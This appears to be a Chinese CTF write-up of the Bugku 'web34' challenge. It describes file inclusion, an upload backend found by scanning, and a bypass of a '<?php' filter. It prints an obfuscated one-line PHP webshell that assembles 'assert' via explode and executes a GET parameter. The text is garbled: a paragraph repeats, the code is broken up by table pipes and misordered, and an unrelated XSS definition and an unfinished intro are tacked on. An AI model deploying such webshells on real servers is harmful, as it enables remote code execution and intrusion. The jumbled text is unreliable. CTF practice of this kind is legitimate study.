bugku3
web34
提示说是文件包含漏洞,果然是,遍历了一次目录,没有什么收获,用御剑扫了一下,发现有一个文件上传的后台,上传一句话木马,发现被过滤了<?php ?>
想想有没有替代方式,突然想起来之前好像有个帖子说可以不用
<?php
1 | <scrpit language=php>xxxxxxxx</script> |
构造一句话木马:
提示说是文件包含漏洞,果然是,遍历了一次目录,没有什么收获,用御剑扫了一下,发现有一个文件上传的后台,上传一句话木马,发现被过滤了<?php ?>
想想有没有替代方式,突然想起来之前好像有个帖子说可以不用
<?php
1 | <scrpit language=php>xxxxxxxx</script> |
构造一句话木马:
1 | "a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc= |
这个explode(“a”,$b),以a为分隔,将b分割成一个个数组
XSS跨站脚本攻击(Cross Site Scripting),是将Java script代码插入web页面中,之后当用户浏览页面时, 会执行嵌套在web页面里面的Java script代码,从而达到攻击用户的目的。为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分,所以叫作XSS.
其实已经做过好多文件包含的练习,但是都是比较零碎的题目
这次就整体一起来总结一下吧: